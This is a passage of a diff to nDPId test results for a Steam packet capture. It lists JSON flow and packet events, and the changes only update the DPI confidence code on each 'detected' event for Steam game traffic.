00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"steam.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1357332165037,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165037,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARORzAqLyVy025BbJhaYkALFmPVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"steam.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"steam.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165038,"flow_last_seen":1357332165038,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165038,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1357332165038,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165038,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx3AqLyVkkKYD7JhaYoALLOPVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165038,"flow_last_seen":1357332165038,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165038,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165038,"flow_last_seen":1357332165038,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165038,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1357332165075,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165075,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTYAAIAR3dxIpT2vwKi8lWmJsmEANO1rVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAw5zrdLEAAAA="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165087,"flow_last_seen":1357332165087,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165087,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1357332165087,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165087,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx3AqLyVkkKYD7JhaYsALLOOVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165087,"flow_last_seen":1357332165087,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165087,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165087,"flow_last_seen":1357332165087,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165087,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165087,"flow_last_seen":1357332165087,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165087,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1357332165087,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165087,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxzAqLyVSKU9rrJhaYoALFeOVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165087,"flow_last_seen":1357332165087,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165087,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165087,"flow_last_seen":1357332165087,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165087,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165088,"flow_last_seen":1357332165088,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165088,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1357332165088,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165088,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARZ6vAqLyV0G+FVLJhaYkALIgeVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165088,"flow_last_seen":1357332165088,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165088,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165088,"flow_last_seen":1357332165088,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165088,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"steam.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165088,"flow_last_seen":1357332165088,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165088,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"steam.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1357332165088,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165088,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkyDAqLyVkkKYDLJhaYkALLOTVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"steam.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165088,"flow_last_seen":1357332165088,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165088,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"steam.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165088,"flow_last_seen":1357332165088,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165088,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1357332165121,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165121,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTcAAIAROeCSQpgNwKi8lWmJsmEANEZHVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAkDOUBj8BAAA="} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1357332165125,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165125,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTgAAIAR3dtIpT2uwKi8lWmKsmEANFKmVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAqXeqX6cAAAA="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"steam.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165137,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"steam.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1357332165137,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165137,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+LzAqLyVUatzB7JhaYkALBkwVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"steam.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165137,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"steam.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165137,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165137,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1357332165137,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165137,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNw\/AqLyVSKU9u7JhaYkALFeCVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165137,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165137,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"steam.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165138,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"steam.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1357332165138,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165138,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+L7AqLyVUatzBbJhaYkALBkyVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"steam.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165138,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"steam.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165138,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165138,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1357332165138,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165138,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARZ6vAqLyV0G+FVLJhaYoALIgdVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165138,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165138,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1357332165148,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165148,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTkAAIARDmnQb4VVwKi8lWmKsmEANIntVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAATel0NDIBAAA="} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1357332165166,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165166,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWToAAIAROdySQpgOwKi8lWmJsmEANCG6VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA27XMEOAAAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1357332165175,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165175,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTsAAIAR3ctIpT27wKi8lWmJsmEANAJdVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA5fe1HLAAAAA="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165187,"flow_last_seen":1357332165187,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165187,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
